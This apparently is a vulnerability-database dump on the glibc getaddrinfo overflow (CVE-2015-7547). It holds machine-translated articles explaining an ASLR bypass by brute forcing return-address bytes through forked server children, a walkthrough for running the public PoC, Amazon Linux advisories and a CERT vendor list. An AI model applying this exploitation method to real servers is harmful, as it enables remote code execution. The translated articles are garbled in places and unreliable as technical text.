\nEach time the main process performed in response to processing, it will own fork a sub-process. According to the foregoing Description, This means that all the child processes share the same memory layout-including load module address. This scene for many services, such as HTTP proxy, email server or DNS servers are very common. \n0x04 attack process example\nIn the implementation of the attack process, we assume that the attacker has to be able to respond to victims of any DNS request capability. To achieve this situation completely by ARP spoofing, DNS spoofing is complete. Attack scenarios the following figure: \n! [](/Article/UploadPic/2017-2/201722018366681. png? www. myhack58. com) \n1\\. An attacker constructs a request is sent to the victim Server\n2\\. In response to the attacker's request, the victim Server daemon fork a child process\n3\\. The sub-process processing request, initiates a DNS request \n4\\. The attacker replies with a malicious DNS response, the response will be a child process of the return address of the cover, and here we set it not 0x12121212 \n5\\. Attacker to obtain sub-process with the connect()function initiates the TCP back connection\nIf 0x12121212 is indeed getaddrinfo()return the correct address, then the process will run normally, and by the connect()initiates a tcp connection. \n! [](/Article/UploadPic/2017-2/201722018366148. png? www. myhack58. com) \nIf this is not the case, and the attacker is the return address is written as any other address, the application will be due to a memory segmentation fault, or execution of an invalid instruction and crashes. \n! [](/Article/UploadPic/2017-2/201722018366410. png? www. myhack58. com) \nThis way you can be judged as an address is getaddrinfo()returns the address of a method, the reason is that if the address is correct, then a TCP connection will be successfully established. 
Since the module base address in a different sub-process is not random of the previously mentioned common memory layout, so the address in all the sub-processes can be common. An attacker can use this way to go through each possible address, and know the right to establish a TCP connection and get the correct address. \nHowever, using this manner is the base address of the positioning need to guess 2 of the 64-th power of the number of addresses, this is not much practical significance. \nByte-by-byte approach\nHowever, an attacker can each cover only one byte. For example, assume that getaddrinfo returns addresses for 0x00007fff01020304: the \n! [](/Article/UploadPic/2017-2/201722018366285. png? www. myhack58. com) \n! [](/Article/UploadPic/2017-2/201722018366886. png? www. myhack58. com) \nFirst we'll cover the getaddrinfo()function returns the address of the least significant bit LSB of the byte. Here with 0x00 overwritten. Due to the assumption that getaddrinfo()returns addresses for 0x00007fff01020304,the lowest bit coverage is 0x00, then this return address will be changed to 0x00007fff01020300, since the address is illegal address, the function returns after the program will crash. So we continue the above operation is repeated, and each repetition is the LSB only 1 plus that is the first 0x00,the second 0x01,the third 0x02,...when we will be the LSB is increased to 0x04, the getaddrinfo function returns the address to the correct return address 0x00007fff01020304, then the program does not crash, the establishment of a tcp connection. So the lowest bit of the value will be determined. \nNext, we repeat the entire operation, by overwriting the return address of the two bytes 0x04 0x00 to enumerate the next byte, we will return the address of the first byte set to just guess out of the correct bytes 0x04,and so we just need to take the same way to guess the second byte can be. 
Guess the success of the flag and the first byte of the same, to establish the correct connection. \n\n\n**[1] [[2]](<83590_2.htm>) [next](<83590_2.htm>)**\n", "modified": "2017-02-20T00:00:00", "published": "2017-02-20T00:00:00", "href": "http://www.myhack58.com/Article/html/3/62/2017/83590.htm", "id": "MYHACK58:62201783590", "type": "myhack58", "title": "How to by CVE-2015-7547(GLIBC getaddrinfo)vulnerability to bypass ASLR-exploits warning-the black bar safety net", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-03-05T05:28:21", "bulletinFamily": "info", "cvelist": ["CVE-2015-7547"], "edition": 1, "description": "! [](/Article/UploadPic/2017-3/201735111132310.jpg)\n\n#### 0x01 introduction\n\n2016 2 on 16 May, Google disclosed a critical buffer overflow vulnerability in the GLIBC library in the getaddrinfo function in the trigger. At the same time they also provided a copy of the PoC. Based on this, in this article, we will show how to by CVE-2015-7547 bypass ASLR.\n\n#### 0x02 vulnerability description\n\ngetaddrinfo()function is the role by querying the DNS service, the host name and the server resolves to the addrinfo structure.\n\n! [](/Article/UploadPic/2017-3/201735111133634.jpg)\n\nIn the getaddrinfo()function implementation, use the alloca()function(on the stack allocated buffer)to the DNS response. The beginning, the function first allocates a section of stack space for the DNS response, if the response time is too long, it will re-allocate a heap buffer for the response. But since the update to the code the buffer to the newly allocated heap buffer, stack of old buffer delay in the release, still use. This dangling pointer will cause a classic buffer overflow.\n\n#### ASLR? ASLR!\n\nIn the above case, by this vulnerability cover the getaddrinfo()function's return address, but we should be the return address of the cover to where? 
When you enable ASLR system, The module address is random. Therefore, the attacker can not be attack stream address is set to the pre-set address.\n\n#### fork()\n\nfork()is Linux create a new process. A typical fork using the method as shown below:\n\n! [](/Article/UploadPic/2017-3/201735111133212.jpg)\n\nfork a child process and the parent process use the same instruction segment, they only have the pid is not the same, and pid is the fork function returns to the child process. And windows under the code multiplexing, the difference is that here means that the child process and its parent processes share many characteristics-have the same register state, stack and memory layout.\n\n#### 0x03 program flow example\n\nConsider a server application, its mode of operation is as follows:\n\n! [](/Article/UploadPic/2017-3/201735111133341.jpg)\n\n1\\. Client remote connection to the application.\n\n2\\. Application your fork a child process for responding to client requests\n\n3\\. In processing the client request process, sub-process using\"getaddrinfo()\"function to parse the host name. At the same time, it to which DNS server to send DNS requests.\n\n4\\. The DNS server for the DNS request to make a legitimate response.\n\n5\\. The sub-process started and has parsed the host connection.\n\nEach time the main process performed in response to processing, it will own fork a sub-process. According to the foregoing Description, This means that all the child processes share the same memory layout-including load module address. This scene for many services(e.g. HTTP proxy, mail server or DNS server)is very common.\n\n#### 0x04 attack process example\n\nIn the implementation of the attack process, we assume that the attacker has to be able to respond to victims of any DNS request capability. To achieve this situation completely by ARP spoofing, DNS spoofing is complete. Attack scenarios the following figure:\n\n! [](/Article/UploadPic/2017-3/201735111133849.jpg)\n\n1\\. 
An attacker constructs a request is sent to the victim Server\n\n2\\. In response to the attacker's request, the victim Server daemon fork a child process\n\n3\\. The sub-process processing request, initiates a DNS request\n\n4\\. The attacker replies with a malicious DNS response, the response will be a child process of the return address of the cover, and here we set it not 0x12121212\n\n5\\. Attacker to obtain sub-process with the connect()function initiates the TCP back connection\n\nIf 0x12121212 is indeed getaddrinfo()return the correct address, then the process will run normally, and by the connect()initiates a tcp connection.\n\n! [](/Article/UploadPic/2017-3/201735111133519.jpg)\n\nIf this is not the case, and the attacker is the return address is written as any other address, the application will be due to a memory segmentation fault, or execution of an invalid instruction and crashes.\n\n! [](/Article/UploadPic/2017-3/201735111133591.jpg)\n\nThis way you can be judged as an address is getaddrinfo()returns the address of a method, the reason is that if the address is correct, then a TCP connection will be successfully established. Since the module base address in a different sub-process is not randomized(the previously mentioned common memory layout), then this address in all the sub-processes can be common. An attacker can use this way to go through each possible address, and know the right to establish a TCP connection and get the correct address.\n\nHowever, using this manner is the base address of the positioning need to guess 2 of the 64-th power of the number of addresses, this is not much practical significance.\n\n#### Byte-by-byte approach\n\nHowever, an attacker can each cover only one byte. For example, assume that getaddrinfo returns addresses for 0x00007fff01020304: the\n\n! [](/Article/UploadPic/2017-3/201735111133657.jpg)\n\n! 
[](/Article/UploadPic/2017-3/201735111133920.jpg)\n\nFirst we'll cover the getaddrinfo()function returns the address of the least significant bit(LSB)of the byte. Here with 0x00 overwritten. Due to the assumption that getaddrinfo()returns addresses for 0x00007fff01020304,the lowest bit coverage is 0x00, then this return address will be changed to 0x00007fff01020300, since the address is illegal address, the function returns after the program will crash. So we continue the above operation is repeated, and each repetition is the LSB only plus 1(i.e., the first 0x00,the second 0x01,the third 0x02,...), when we will be the LSB is increased to 0x04, the getaddrinfo function returns the address to the correct return address 0x00007fff01020304, then the program does not crash, the establishment of a tcp connection. So the lowest bit of the value will be determined.\n\n**[1] [[2]](<83974_2.htm>) [next](<83974_2.htm>)**\n", "modified": "2017-03-05T00:00:00", "published": "2017-03-05T00:00:00", "href": "http://www.myhack58.com/Article/html/3/62/2017/83974.htm", "id": "MYHACK58:62201783974", "type": "myhack58", "title": "How to by CVE-2015-7547(GLIBC getaddrinfo)vulnerability to bypass ASLR-exploits warning-the black bar safety net", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-11-01T13:01:20", "bulletinFamily": "info", "cvelist": ["CVE-2015-7547"], "edition": 1, "description": "Google's security research team recently disclosed a glibc getaddrinfo-overflow vulnerability.\n\nVulnerability details the discovery process can be found in the [Google blog](<https://googleonlinesecurity.blogspot.ca/2016/02/cve-2015-7547-glibc-getaddrinfo-stack.html?m=1> a). 
(Digression, Google engineers are genuine)\n\n## Vulnerability description:\n\nThe vulnerability is caused by a DNS server response that exceeds 2048 bytes, which leads the following response to trigger a stack overflow.\n\nThe vulnerability relies on an oversized (2048 bytes) UDP or TCP response, which is followed by another response that will overwrite the stack.\n\n## Impact range:\n\nAll of the Debian family and Red Hat series of Linux distributions are affected, as long as the glibc version is greater than 2.9.\n\nCurrently Google has provided a POC; according to the Google blog, the vulnerability should be able to bypass memory protection techniques, thereby forming a code execution vulnerability.\n\n## POC using the test\n\nPOC address: [github.com/fjserna/CVE-2015-7547](<http://github.com/fjserna/CVE-2015-7547>)\n\nI tested on my own local lubuntu, where the libc version is 2.19. The lubuntu series also belongs to the Debian release family, so in theory it meets the vulnerability criteria.\n\nThe test procedure is as follows:\n\nAccording to the vulnerability description, we can set up a fake DNS server as an intermediary to verify the vulnerability.\n\n1. Change DNS to resolve to 127.0.0.1, refresh the DNS cache: sudo /etc/init.d/nscd restart\n2. Execute [CVE-2015-7547-poc.py](<https://github.com/fjserna/CVE-2015-7547/blob/master/CVE-2015-7547-poc.py>) , note that without changing the ip_addr on.\n3. Compile [CVE-2015-7547-client.c](<https://github.com/fjserna/CVE-2015-7547/blob/master/CVE-2015-7547-client.c>) , then run [CVE-2015-7547-client](<https://github.com/fjserna/CVE-2015-7547/blob/master/CVE-2015-7547-client.c>)\n\nIf the system contains the vulnerability, this will cause a Segmentation Fault.\n\n! [](/Article/UploadPic/2016-2/2 0 1 6 2 1 8 9 3 1 8 2 3 0. png)\n\nSince glibc 2.9 was released in 2008, a large number of Linux systems are affected by the vulnerability. 
If the memory-protection mitigations can be bypassed, the bug becomes a powerful remote code execution primitive. \n\nAn attacker who controls a DNS server, or who can intercept DNS traffic in a man-in-the-middle position, could compromise many hosts in bulk.
\n\n\n \n\n\n**New Packages:**\n \n \n i686: \n glibc-debuginfo-2.17-106.167.amzn1.i686 \n glibc-debuginfo-common-2.17-106.167.amzn1.i686 \n glibc-devel-2.17-106.167.amzn1.i686 \n glibc-headers-2.17-106.167.amzn1.i686 \n nscd-2.17-106.167.amzn1.i686 \n glibc-utils-2.17-106.167.amzn1.i686 \n glibc-2.17-106.167.amzn1.i686 \n glibc-common-2.17-106.167.amzn1.i686 \n glibc-static-2.17-106.167.amzn1.i686 \n \n src: \n glibc-2.17-106.167.amzn1.src \n \n x86_64: \n glibc-2.17-106.167.amzn1.x86_64 \n glibc-static-2.17-106.167.amzn1.x86_64 \n glibc-headers-2.17-106.167.amzn1.x86_64 \n glibc-utils-2.17-106.167.amzn1.x86_64 \n glibc-devel-2.17-106.167.amzn1.x86_64 \n glibc-common-2.17-106.167.amzn1.x86_64 \n glibc-debuginfo-common-2.17-106.167.amzn1.x86_64 \n nscd-2.17-106.167.amzn1.x86_64 \n glibc-debuginfo-2.17-106.167.amzn1.x86_64 \n \n \n", "edition": 3, "modified": "2016-03-10T16:30:00", "published": "2016-03-10T16:30:00", "id": "ALAS-2016-660", "href": "https://alas.aws.amazon.com/ALAS-2016-660.html", "title": "Low: glibc", "type": "amazon", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-11-10T12:36:17", "bulletinFamily": "unix", "cvelist": ["CVE-2015-7547"], "description": "**Issue Overview:**\n\nA stack-based buffer overflow flaw was found in the send_dg() and send_vc() functions, used by getaddrinfo() and other higher-level interfaces of glibc. A remote attacker able to cause an application to call either of these functions could use this flaw to execute arbitrary code with the permissions of the user running the application.\n\n \n**Affected Packages:** \n\n\nglibc\n\n \n**Issue Correction:** \nRun _yum update glibc_ to update your system. Note that you may need to run _yum clean all_ first. Once this update has been applied, _reboot your instance to ensure that all processes and daemons that link against glibc are using the updated version_. 
On new instance launches prior to Amazon Linux AMI 2015.09.2, you should still reboot after cloud-init has [automatically applied](<https://aws.amazon.com/amazon-linux-ami/faqs/#auto_update>) this update.\n\n \n\n\n**New Packages:**\n \n \n i686: \n glibc-static-2.17-106.166.amzn1.i686 \n glibc-debuginfo-2.17-106.166.amzn1.i686 \n glibc-debuginfo-common-2.17-106.166.amzn1.i686 \n glibc-headers-2.17-106.166.amzn1.i686 \n glibc-2.17-106.166.amzn1.i686 \n glibc-common-2.17-106.166.amzn1.i686 \n glibc-devel-2.17-106.166.amzn1.i686 \n nscd-2.17-106.166.amzn1.i686 \n glibc-utils-2.17-106.166.amzn1.i686 \n \n src: \n glibc-2.17-106.166.amzn1.src \n \n x86_64: \n glibc-devel-2.17-106.166.amzn1.x86_64 \n glibc-utils-2.17-106.166.amzn1.x86_64 \n glibc-2.17-106.166.amzn1.x86_64 \n nscd-2.17-106.166.amzn1.x86_64 \n glibc-debuginfo-2.17-106.166.amzn1.x86_64 \n glibc-debuginfo-common-2.17-106.166.amzn1.x86_64 \n glibc-common-2.17-106.166.amzn1.x86_64 \n glibc-static-2.17-106.166.amzn1.x86_64 \n glibc-headers-2.17-106.166.amzn1.x86_64 \n \n \n", "edition": 4, "modified": "2016-02-16T06:00:00", "published": "2016-02-16T06:00:00", "id": "ALAS-2016-653", "href": "https://alas.aws.amazon.com/ALAS-2016-653.html", "title": "Critical: glibc", "type": "amazon", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "cert": [{"lastseen": "2020-09-18T20:41:04", "bulletinFamily": "info", "cvelist": ["CVE-2015-7547"], "description": "### Overview \n\nGNU `glibc` contains a buffer overflow vulnerability in the DNS resolver, which may allow a remote attacker to execute arbitrary code.\n\n### Description \n\n[**CWE-121**](<http://cwe.mitre.org/data/definitions/121.html>)**: Stack-based Buffer Overflow - **CVE-2015-7547\n\nAccording to a Google security [blog post](<https://googleonlinesecurity.blogspot.com/2016/02/cve-2015-7547-glibc-getaddrinfo-stack.html>): \n \n\"The `glibc` DNS client side resolver is vulnerable to a stack-based buffer overflow when the `getaddrinfo()` library 
function is used. Software using this function may be exploited with attacker-controlled domain names, attacker-controlled DNS servers, or through a man-in-the-middle attack.\" \n \nAccording to `glibc` developers, the vulnerable code was initially added in May 2008 as part of the development for `glibc` 2.9. All versions from 2.9 (originally released November 2008) to 2.22 appear to be affected. \n \nMore details and analysis are available in the [patch announcement](<https://sourceware.org/ml/libc-alpha/2016-02/msg00416.html>) from `glibc` developers. \n \n--- \n \n### Impact \n\nThe `getaddrinfo()` function allows a buffer overflow condition in which arbitrary code may be executed. The impact may vary depending on if the use case is local or remote. \n \n--- \n \n### Solution \n\n**Apply an update** \n \nA [patch](<https://sourceware.org/ml/libc-alpha/2016-02/msg00416.html>) for `glibc` is available. Affected users should apply the patch as soon as possible. The patch will also be included as part of the upcoming `glibc` 2.23 release. \n \nThe Vendor Status information below provides more information on updates. \n \n--- \n \n### Vendor Information\n\nSome embedded operating systems or older, no longer supported versions of linux distributions may contain an older version of `glibc` that is vulnerable. Please check with your vendor to find out if you need to upgrade to a newer operating system in order to address this issue. \n \n--- \n \n457759\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. 
Click here to view vendors.**\n\n### Android Open Source Project Affected\n\nNotified: February 17, 2016 Updated: February 23, 2016 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Arista Networks, Inc. __ Affected\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n**Statement Date: February 17, 2016**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\n\"Arista Networks is investigating the applicability of VU#457759 to our products. More information will be available as the investigation proceeds.\"\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://www.arista.com/en/support/advisories-notices/security-advisories/1255-security-advisory-17>\n\n### Blue Coat Systems __ Affected\n\nNotified: February 17, 2016 Updated: February 26, 2016 \n\n**Statement Date: February 26, 2016**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\n\"Blue Coat products using an affected version of the GNU C Library (glibc) are susceptible to a remote execution attack. A remote attacker can send a crafted DNS response to the glibc DNS resolver and cause the resolver to crash or execute arbitrary code.\"\n\n### Vendor Information \n\nFixes for the vulnerable products are pending. Please see the advisory below.\n\n### Vendor References\n\n * <https://bto.bluecoat.com/security-advisory/sa114>\n\n### CentOS __ Affected\n\nNotified: February 17, 2016 Updated: March 14, 2016 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nA patched version of glibc is available for CentOS. 
The forum discussion at the URL below provides further information.\n\n### Vendor References\n\n * <https://www.centos.org/forums/viewtopic.php?t=56467>\n\n### Cisco __ Affected\n\nNotified: February 17, 2016 Updated: February 18, 2016 \n\n**Statement Date: February 18, 2016**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nCisco has provided a security advisory which contains details of which products are affected at the URL below:\n\n### Vendor References\n\n * <http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160218-glibc>\n\n### Debian GNU/Linux __ Affected\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n**Statement Date: February 17, 2016**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nDebian has released glibc updates containing the patches. Please see the announcements below:\n\n### Vendor References\n\n * <https://lists.debian.org/debian-security-announce/2016/msg00050.html>\n * <https://lists.debian.org/debian-security-announce/2016/msg00051.html>\n * <https://lists.debian.org/debian-lts-announce/2016/02/msg00009.html>\n\n### GNU glibc __ Affected\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nA detailed analysis and patch for glibc are available at the URL below.\n\n### Vendor References\n\n * <https://sourceware.org/ml/libc-alpha/2016-02/msg00416.html>\n\n### Gentoo Linux __ Affected\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n**Statement Date: February 17, 2016**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nglibc has been updated with the patch on Gentoo. 
Please see the Gentoo security advisory at the URL below.\n\n### Addendum\n\n`<https://security.gentoo.org/glsa/201602-02>`\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23457759 Feedback>).\n\n### Red Hat, Inc. __ Affected\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nglibc has been updated with the patch. Please see the Red Hat security advisory at the URL below.\n\n### Vendor References\n\n * <https://access.redhat.com/security/cve/CVE-2015-7547>\n\n### Ubuntu __ Affected\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n**Statement Date: February 17, 2016**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nUbuntu has released a patched version of glibc. Please see the security advisory at the URL below:\n\n### Vendor References\n\n * <http://www.ubuntu.com/usn/usn-2900-1/>\n\n### EfficientIP __ Not Affected\n\nUpdated: February 18, 2016 \n\n**Statement Date: February 18, 2016**\n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\n\"`No version of our software is affected by VU#457759 (glibc vulnerable to stack buffer overflow in DNS resolver)`\"\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Openwall GNU/*/Linux __ Not Affected\n\nNotified: February 17, 2016 Updated: February 22, 2016 \n\n**Statement Date: February 20, 2016**\n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\n\"Openwall GNU/*/Linux is not affected. We use a fork of a version of glibc predating the introduction of this vulnerability. 
\n \nWe have previously patched the somewhat related GHOST vulnerability.\"\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### PC-BSD __ Not Affected\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n**Statement Date: February 17, 2016**\n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nPC-BSD is based upon FreeBSD, and as such does *not* use glibc by default for any native *BSD applications. As such, it is not vulnerable to CVE-2015-7547. \n \nPC-BSD does allow running Linux applications through emulation, in which case users should ensure their packages / VM's are updated in accordance with upstream methods.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### TCPWave __ Not Affected\n\nUpdated: February 18, 2016 \n\n**Statement Date: February 18, 2016**\n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\n\"The TCPWave DNS Appliances and TCPWave Sharkcage Appliances do not use a vulnerable version of glibc in the current production releases. A newer version that is scheduled for a summer release has been found vulnerable and has been patches. 
When the customers upgrade the existing appliances to a newer version, they will not be impacted by this vulnerability.\"\n\n### Vendor Information \n\nTCPWave has provided a security advisory at the URL below:\n\n### Vendor References\n\n * <http://www.tcpwave.com/security-advisory-vu457759/>\n\n### ACCESS Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### AT&T Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Alcatel-Lucent Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Apple Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Arch Linux Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Aruba Networks Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Avaya, Inc. 
Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Barracuda Networks Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Belkin, Inc. Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Brocade Communication Systems Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### CA Technologies Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Check Point Software Technologies Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Contiki OS Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### CoreOS Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### D-Link Systems, Inc. 
Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### DesktopBSD Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### DragonFly BSD Project Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### EMC Corporation Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Enterasys Networks Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Ericsson Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### European Registry for Internet Domains Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Extreme Networks Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### F5 Networks, Inc. 
Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Fedora Project Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Force10 Networks Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Fortinet, Inc. __ Unknown\n\nNotified: February 17, 2016 Updated: February 29, 2016 \n\n**Statement Date: February 29, 2016**\n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe following products are confirmed to be **not affected**: \n\n * FortiOS\n * FortiSwitch\n * FortiAnalyzer\nOther products are in the course of being investigated. Please see the URL below for more information and updates. 
\n\n### Vendor References\n\n * <http://www.fortiguard.com/advisory/glibc-getaddrinfo-stack-overflow>\n\n### Foundry Brocade Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### FreeBSD Project Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### GNU adns Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Google Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Hardened BSD Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Hewlett Packard Enterprise Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Hitachi Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Huawei Technologies Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### IBM Corporation Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a 
statement from the vendor.\n\n### Vendor References\n\n### IBM eServer Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Infoblox Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Intel Corporation Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Internet Systems Consortium Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Internet Systems Consortium - DHCP Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### JH Software Unknown\n\nNotified: February 17, 2016 Updated: February 17, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Juniper Networks __ 